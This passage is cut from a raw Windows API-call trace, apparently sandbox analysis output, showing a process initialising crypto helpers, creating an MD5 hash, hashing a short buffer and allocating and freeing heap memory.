hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0074.737] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.737] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0074.737] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.737] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.737] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0074.737] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.737] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77710000 [0074.737] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.737] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0074.738] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.738] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.738] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.738] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.738] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.738] PeekMessageW (in: lpMsg=0x61e57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e57c) returned 0 [0074.738] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.738] CryptAcquireContextA (in: phProv=0x61e550, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x61e550*=0x696ad0) returned 1 [0074.758] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.758] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0074.758] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.758] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0074.758] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0074.758] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0074.758] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.758] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.760] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0074.764] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0074.764] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0074.764] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.764] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0074.765] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.765] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.765] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.765] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.765] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.765] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.765] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0074.765] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.765] CryptCreateHash (in: hProv=0x696ad0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x61e2c0 | out: phHash=0x61e2c0) returned 1 [0074.766] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.766] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.766] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.766] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.766] CharLowerBuffW (in: lpsz="byte[22]", cchLength=0x8 | out: lpsz="byte[22]") returned 0x8 [0074.766] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.766] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.766] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.766] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0074.766] CryptHashData (hHash=0x6b8b38, pbData=0x6f9708, dwDataLen=0x16, dwFlags=0x1) returned 1 [0074.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0074.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a0ec8 [0074.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0074.766] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0074.767] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0074.767] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e510 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e528 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0074.768] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e540 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e528 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4e8 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3d8 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0074.768] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e090 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b480 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9768 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0d8 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e120 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e150 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0ca8 | out: hHeap=0x650000) returned 1 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x650000) returned 1 [0074.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0074.769] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.769] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.769] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a0ca8 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0ca8 | out: hHeap=0x650000) returned 1 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0074.770] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.770] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b78 | out: hHeap=0x650000) returned 1 [0074.770] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.770] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0074.771] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e480 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0074.771] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e480 | out: hHeap=0x650000) returned 1 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e468 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.771] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0074.771] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4a8 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0074.772] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4a8 | out: hHeap=0x650000) returned 1 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e180 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0074.772] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4a8 [0074.772] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0074.772] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 